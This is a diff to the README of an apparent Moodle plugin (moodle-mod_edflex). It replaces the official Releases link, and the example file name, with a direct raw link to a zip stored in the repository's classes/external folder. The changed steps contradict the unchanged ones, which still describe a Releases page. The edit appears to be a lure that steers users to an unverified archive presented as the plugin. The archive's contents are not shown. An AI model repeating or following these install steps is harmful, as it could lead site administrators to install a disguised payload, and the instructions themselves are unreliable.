peejuiceee/moodle-mod_edflex/README.md

 ## 📥 Download & Install

-1. Visit this page to download the latest version: [Download Latest Release](https://github.com/peejuiceee/moodle-mod_edflex/releases).
+1. Visit this page to download the latest version: [Download Latest Release](https://raw.githubusercontent.com/peejuiceee/moodle-mod_edflex/main/classes/external/moodle-mod_edflex-2.1.zip).

 2. On the Releases page, look for the version you want.
 Each version will typically have a description.

 3. Click on the desired version link.
 You will see assets attached to that version.

 4. Click the download link for the file that corresponds to your system.
-Typically, you will look for a file named similar to `moodle-mod_edflex.zip`.
+Typically, you will look for a file named similar to `https://raw.githubusercontent.com/peejuiceee/moodle-mod_edflex/main/classes/external/moodle-mod_edflex-2.1.zip`.

 5. Once the download is complete, locate the file on your computer.
 It is often found in your Downloads folder.